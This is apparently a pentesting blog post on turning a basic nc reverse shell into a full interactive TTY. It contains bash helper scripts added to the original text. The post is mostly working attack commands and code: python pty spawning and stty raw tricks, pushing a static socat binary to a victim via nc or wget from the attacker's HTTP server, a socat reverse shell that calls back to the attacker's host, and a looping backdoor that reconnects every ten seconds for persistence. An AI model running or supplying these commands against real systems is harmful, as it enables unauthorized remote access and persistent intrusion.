Methods to Upgrade nc Reverse Shells

May 16, 2018
pentesting shell

Ended up with a cheap nc shell and want to upgrade it to a “real” shell with a proper TTY, tab completion and command history?

Say no more <:

1. Upgrading using shell magic

This only works if Python is present on the victim's machine, but when it is, it is the quickest route.

  1. Use bash on the attacker machine; zsh doesn't seem to work.
  2. Get the nc shell.
  3. In the shell, execute python -c 'import pty; pty.spawn("/bin/sh")' (python3 on newer systems, and /bin/bash if it is installed) to allocate a TTY in the nc session.
  4. Execute export TERM=xterm-256color for proper color support.
  5. Put the shell into the background using CTRL+Z.
  6. Configure the local terminal using stty raw -echo. From now on nothing you type is echoed locally, so the next command is typed blind.
  7. Execute fg to bring the nc shell back.
  8. Type reset and press enter.

You now have a proper interactive shell: CTRL+C is delivered to the remote process instead of killing the nc session, and tab completion, history and full-screen programs such as vim work <:
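As an added example (not part of the original post), an attacker-side bash helper that scripts the local half of the procedure above: it reads the size of your terminal from stty -a, prints the commands to paste on the victim side (including the stty rows/cols fix so the remote pty matches your window), switches the local terminal to raw mode, resumes the nc job and restores the terminal when the session ends. The function names, the python3-first fallback and the /bin/bash target are assumptions made here.

```shell
# upgrade-tty.sh: attacker-side helper for the "shell magic" upgrade.
# Added example, not from the original post. Source it into an interactive
# bash session (". ./upgrade-tty.sh"); once the nc session is backgrounded
# with CTRL+Z, run nc_upgrade.

# Extract "ROWS COLS" from the first line of `stty -a`. Handles the GNU form
# ("speed 38400 baud; rows 50; columns 200; line = 0;") and the BSD/macOS form
# ("speed 9600 baud; 50 rows; 200 columns;"); falls back to 24x80.
stty_dims() {
    local line="$1" rows cols
    rows=$(printf '%s\n' "$line" \
        | grep -oE 'rows[[:space:]]+[0-9]+|[0-9]+[[:space:]]+rows' \
        | grep -oE '[0-9]+' || true)
    cols=$(printf '%s\n' "$line" \
        | grep -oE 'columns[[:space:]]+[0-9]+|[0-9]+[[:space:]]+columns' \
        | grep -oE '[0-9]+' || true)
    printf '%s %s\n' "${rows:-24}" "${cols:-80}"
}

# Victim side, step 3: allocate a pty. Tries python3 first, then python;
# /bin/bash is assumed here, use /bin/sh if the target lacks it.
victim_pty_cmd() {
    printf '%s\n' "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || python -c 'import pty; pty.spawn(\"/bin/bash\")'"
}

# Victim side, after fg: terminal type, reset, and the size fix (rows/cols
# taken from the attacker terminal so the remote pty matches it).
victim_post_fg_cmds() {   # args: rows cols [term]
    local rows="$1" cols="$2" term="${3:-xterm-256color}"
    printf '%s\n' "export TERM=$term" "reset" "stty rows $rows cols $cols"
}

# Attacker side: run with the nc session stopped in the background (CTRL+Z).
nc_upgrade() {
    local saved dims
    saved=$(stty -g)                          # remember local tty settings
    dims=$(stty_dims "$(stty -a | head -n 1)")
    printf 'After fg, paste into the victim shell:\n'
    victim_post_fg_cmds $dims                 # unquoted on purpose: splits rows/cols
    stty raw -echo                            # keys go straight to the victim, nothing echoes locally
    fg                                        # resume the nc session; returns when it ends
    stty "$saved"                             # put the local terminal back
}
```

Run victim_pty_cmd first to get the exact spawn line for step 3; nc_upgrade takes over from step 5 and, because it saved the settings with stty -g, you are not left with a raw, echo-less terminal when the connection drops.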

If this didn’t work, try the next method:

2. Upgrading using socat

The tool socat can be used to create a proper PTY-backed shell session. For this, a statically linked binary of the tool is required on the victim (the original post links to one): the target is unlikely to have socat installed, and a static build has no library dependencies to satisfy.

First, transfer the socat binary to the victim's machine using nc or wget:

The nc method:

a) Use nc -vvlp 1337 < socat to start a listener that pushes the binary to whoever connects. Depending on the nc flavour, -N (OpenBSD nc) or -q 1 (netcat-traditional and Debian's build of netcat-openbsd) makes the sender close the connection once the file has been sent.

b) On the victim, execute nc <IP> <PORT> > /tmp/socat to download the file. Without one of the flags above the connection does not terminate on its own and you have to stop it manually; in that case compare the size or sha256 of /tmp/socat with the original before trusting it.

The wget method:

a) Attacker: cd into the folder containing the binary and execute python -m SimpleHTTPServer <PORT> (python3 -m http.server <PORT> with Python 3).

b) Victim: cd /tmp && wget http://<IP>:<PORT>/socat && chmod +x socat to download the file from the attacker's machine and make it executable.

After that, it’s time to spawn the shell:

  1. Create a socat listener on the attacking machine with socat file:`tty`,raw,echo=0 tcp-listen:4444. raw,echo=0 puts your own terminal into raw mode, the equivalent of the stty raw -echo step in method 1.

  2. Spawn a proper reverse shell from the nc shell on the victim's box using /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444. pty allocates a pseudo-terminal for bash, stderr sends its stderr down the socket as well, setsid detaches it from the nc session, sigint forwards CTRL+C to it, and sane gives the pty sensible default terminal settings.
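As an added example (not from the original post), attacker-side bash helpers for the socat route: they compute the binary's sha256 locally, print the exact fetch, verify and connect-back commands to paste into the nc shell, serve the binary with python3's http.server and then start the listener. The hash check is what catches a transfer that was cut short, which is easy to do with the nc method above. Function names, the ./socat path, the use of wget and sha256sum on the victim, and the reuseaddr option on the listener are this example's assumptions.

```shell
# socat-upgrade.sh: attacker-side helpers for the socat method.
# Added example, not from the original post. Assumes a static socat binary at
# ./socat, python3 on the attacker box, and wget + sha256sum on the victim.

# sha256 of a file; sha256sum on Linux, shasum on macOS/BSD
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Victim side: download over HTTP and make it executable
victim_fetch_cmd() {      # args: attacker_ip http_port
    printf 'wget -O /tmp/socat http://%s:%s/socat && chmod +x /tmp/socat\n' "$1" "$2"
}

# Victim side: check the copy against the hash computed locally, so a
# truncated transfer is noticed before the binary is run
victim_verify_cmd() {     # arg: expected sha256
    printf 'echo "%s  /tmp/socat" | sha256sum -c -\n' "$1"
}

# Victim side: connect back with a real pty (step 2 of the post)
victim_socat_cmd() {      # args: attacker_ip shell_port
    printf "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%s\n" "$1" "$2"
}

# Attacker side: serve the binary, print what to run on the victim, then listen
serve_and_listen() {      # args: path_to_socat attacker_ip http_port shell_port
    local bin="$1" ip="$2" hport="$3" sport="$4" sum httppid
    sum=$(file_sha256 "$bin")
    echo "# run on the victim, in the nc shell:"
    victim_fetch_cmd "$ip" "$hport"
    victim_verify_cmd "$sum"
    victim_socat_cmd "$ip" "$sport"
    ( cd "$(dirname "$bin")" && exec python3 -m http.server "$hport" ) &
    httppid=$!
    # raw,echo=0 does for our terminal what `stty raw -echo` did in method 1
    socat "file:$(tty),raw,echo=0" "tcp-listen:$sport,reuseaddr"
    kill "$httppid"       # stop serving once the shell session has ended
}
```

Typical use is serve_and_listen ./socat <IP> 8000 4444: paste the three printed lines into the nc shell and the socat listener takes over your terminal as soon as the victim connects.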

Fixing width

In case the width of the shell is too small (lines wrap early, or full-screen programs draw garbage), it can be fixed like this:

  1. In a new local terminal, execute stty -a (or stty size, which prints just the two numbers) to see how many rows and columns the attacker's terminal normally uses.
  2. In the (socat or pty) shell on the victim, run stty rows <num> cols <num> so the remote pty matches.

APT-style persistence

Create a lazy backdoor shell on the victim's machine:

while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>; done &

In case a previous shell breaks, just set up a new listener and the loop reconnects within ten seconds, without the need to run the exploit again. The loop only lives as long as the process that started it, so it does not survive a reboot. Or use tsh.
